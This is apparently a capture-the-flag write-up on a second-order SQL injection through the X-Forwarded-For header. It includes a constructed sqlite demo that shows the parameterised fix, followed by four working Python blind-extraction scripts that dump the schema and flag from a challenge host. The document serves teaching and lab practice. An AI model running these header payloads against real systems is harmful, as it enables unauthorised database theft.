Second-order injection
Yesterday's post was not finished, so here is the rest. The page source carries this debug comment:
<!-- Debug Info:
Duration: 0.59636402130127 s
Current Ip: 10.244.80.46 -->
As soon as you see a Current Ip and a Last Ip in the response, you should suspect that the client address is being written to the database. The address the server uses comes from the X-Forwarded-For header, so that header is where the injection goes.
Send the value 1 first: Current Ip is now 1. Then send 2: Current Ip becomes 2 and Last Ip is 1. Because the first and second values differ, the server does not consult the database for Last Ip; it simply shows the previous value (1) as Last Ip and stores it. Now send 2 again. This time the value matches Current Ip, so the server looks Last Ip up in the database, and that lookup is built from the stored value 1. If 1 is actually a SQL payload, it is executed at that point. That is what makes this a second-order injection: the payload is stored harmlessly on the first request and only reaches a query when the server reads it back later. The second value (2 here) only has to differ from the first, and every probe costs three requests.
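The three-request sequence above, as an added example that is not part of the original post and not the challenge's source. It is a constructed stand-in for the IP tracker: the X-Forwarded-For value is stored with a bound parameter (harmless), and the stored Last Ip is later concatenated into a second query when the same value is sent twice. Assumptions: an in-memory sqlite3 database, so the probes use SQLite's unicode()/substr() and sqlite_master instead of the MySQL ascii()/information_schema in the post's payloads; the "Last Ip: 1" oracle is modelled on the post's observed output; the names F4l9_t4b1e and F4l9_C01uMn come from the post, while the stored flag value and the visits table are constructed. The safe=True path shows the parameterised fix, against which the same extraction yields nothing.

```python
import sqlite3

# Added example (not the challenge's code). Constructed stand-in for the IP
# tracker: the X-Forwarded-For value is stored safely, and the STORED Last Ip
# is later spliced into a query when the same value is sent twice.
# Assumptions: sqlite3 in memory, SQLite dialect (unicode()/sqlite_master);
# the flag value below is constructed, the table/column names are the post's.
class Tracker:
    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE visits (ip TEXT, last_ip TEXT)")
        self.db.execute("CREATE TABLE F4l9_t4b1e (F4l9_C01uMn TEXT)")
        self.db.execute("INSERT INTO F4l9_t4b1e VALUES ('flag{constructed_example}')")
        self.current = None  # value of the last X-Forwarded-For header seen

    def request(self, xff, safe=False):
        """Return the page body for one request whose X-Forwarded-For is `xff`."""
        if xff != self.current:
            # Address changed: the old value becomes Last Ip and both are written
            # with bound parameters, so a payload is stored without firing.
            last, self.current = self.current or "", xff
            self.db.execute("INSERT INTO visits VALUES (?, ?)", (self.current, last))
            return f"Current Ip: {self.current}\nLast Ip: {last}"
        # Same address again: Last Ip is read back from the table...
        stored = self.db.execute(
            "SELECT last_ip FROM visits WHERE ip = ? ORDER BY rowid DESC LIMIT 1",
            (self.current,),
        ).fetchone()[0]
        # ...and used to build a second query. Concatenating it here is the
        # second-order injection point; the bound-parameter form is the fix.
        if safe:
            row = self.db.execute("SELECT 1 FROM visits WHERE ip = ?", (stored,)).fetchone()
        else:
            row = self.db.execute(f"SELECT 1 FROM visits WHERE ip = '{stored}'").fetchone()
        return f"Current Ip: {self.current}\nLast Ip: {row[0] if row else ''}"


def extract(tracker, subquery, max_len=64, safe=False):
    """Boolean-blind extraction of `subquery`'s result through the stored path.

    Each character costs three requests: store the probe, send a different
    value so the probe becomes Last Ip, then repeat that value so the server
    queries with the probe. 'Last Ip: 1' in the body means the probe was true.
    """
    out = ""
    for i in range(1, max_len + 1):
        lo, hi = 0, 127  # invariant: code of char i is in [lo, hi]; 0 = past the end
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"0' or unicode(substr(({subquery}),{i},1))>{mid} or '0"
            tracker.request(probe, safe)               # 1: probe is now Current Ip
            tracker.request("127.0.0.1", safe)         # 2: probe is now the stored Last Ip
            body = tracker.request("127.0.0.1", safe)  # 3: query is built from the probe
            if "Last Ip: 1" in body:
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break  # substr() returned '' : end of the string
        out += chr(lo)
    return out


if __name__ == "__main__":
    print(extract(Tracker(), "select group_concat(name) from sqlite_master where type='table'"))
    print(extract(Tracker(), "select F4l9_C01uMn from F4l9_t4b1e"))
    # Against the parameterised lookup the oracle is always true, so only junk comes back.
    print(repr(extract(Tracker(), "select F4l9_C01uMn from F4l9_t4b1e", max_len=4, safe=True)))
```

The INSERT is parameterised, which is exactly why first-order testing of the header finds nothing; the bug is in the read-back query, and the fix is the same bound parameter there.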
Dumping the database name:
import requests

url = "http://node4.buuoj.cn:25894/"
head = {
    "Cookie": "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
    "X-Forwarded-For": "",
}
# Boolean-blind probe: true when the code of character {0} is greater than {1}.
payload = "0' or ascii(substr((select group_concat(schema_name) from information_schema.schemata),{0},1))>{1} or '0"
result = ""
for i in range(1, 100):
    # Binary search for the character code; 0 means substr() returned '' (end of string).
    l = 0
    r = 127
    while l < r:
        mid = (l + r) >> 1
        # 1st request: the probe becomes Current Ip (stored, not yet queried).
        head["X-Forwarded-For"] = payload.format(i, mid)
        requests.post(url, headers=head)
        # 2nd request: any different value; the probe is now the stored Last Ip.
        head["X-Forwarded-For"] = payload.format(i, mid + 1)
        requests.post(url, headers=head)
        # 3rd request: same value as the 2nd, so the server queries with the stored probe.
        html_0 = requests.post(url, headers=head)
        if "Last Ip: 1" in html_0.text:
            l = mid + 1
        else:
            r = mid
    if l == 0:
        break
    result += chr(l)
    print(result)
print("database:" + result)
Tables:
import requests

url = "http://node4.buuoj.cn:25894/"
head = {
    "Cookie": "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
    "X-Forwarded-For": "",
}
# 0x46346c395f4434743442343565 is the hex form of F4l9_D4t4B45e (avoids quotes).
payload = "0' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"
result = ""
for i in range(1, 100):
    l = 0
    r = 127
    while l < r:
        mid = (l + r) >> 1
        # Store the probe, flip to a different value, repeat it: the third
        # response is the one built from the stored probe.
        head["X-Forwarded-For"] = payload.format(i, mid)
        requests.post(url, headers=head)
        head["X-Forwarded-For"] = payload.format(i, mid + 1)
        requests.post(url, headers=head)
        html_0 = requests.post(url, headers=head)
        if "Last Ip: 1" in html_0.text:
            l = mid + 1
        else:
            r = mid
    if l == 0:
        break
    result += chr(l)
    print(result)
print("table_name:" + result)
Columns:
import requests

url = "http://node4.buuoj.cn:25894/"
head = {
    "Cookie": "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
    "X-Forwarded-For": "",
}
# Filtered on the schema only; add a table_name condition if the database has several tables.
payload = "0' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"
result = ""
for i in range(1, 100):
    l = 0
    r = 127
    while l < r:
        mid = (l + r) >> 1
        # Store the probe, flip to a different value, repeat it: the third
        # response is the one built from the stored probe.
        head["X-Forwarded-For"] = payload.format(i, mid)
        requests.post(url, headers=head)
        head["X-Forwarded-For"] = payload.format(i, mid + 1)
        requests.post(url, headers=head)
        html_0 = requests.post(url, headers=head)
        if "Last Ip: 1" in html_0.text:
            l = mid + 1
        else:
            r = mid
    if l == 0:
        break
    result += chr(l)
    print(result)
print("column_name:" + result)
Flag:
import requests

url = "http://node4.buuoj.cn:25894/"
head = {
    "Cookie": "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
    "X-Forwarded-For": "",
}
# limit 1,1 reads the second row of the table.
payload = "0' or ascii(substr((select F4l9_C01uMn from F4l9_D4t4B45e.F4l9_t4b1e limit 1,1),{0},1))>{1} or '0"
result = ""
for i in range(1, 100):
    l = 0
    r = 127
    while l < r:
        mid = (l + r) >> 1
        # Store the probe, flip to a different value, repeat it: the third
        # response is the one built from the stored probe.
        head["X-Forwarded-For"] = payload.format(i, mid)
        requests.post(url, headers=head)
        head["X-Forwarded-For"] = payload.format(i, mid + 1)
        requests.post(url, headers=head)
        html_0 = requests.post(url, headers=head)
        if "Last Ip: 1" in html_0.text:
            l = mid + 1
        else:
            r = mid
    if l == 0:
        break
    result += chr(l)
    print(result)
print("flag:" + result)
To sum up: at first I took this for an SSRF challenge, and only later realised something was off and that it is an injection challenge. Inexperience on my part.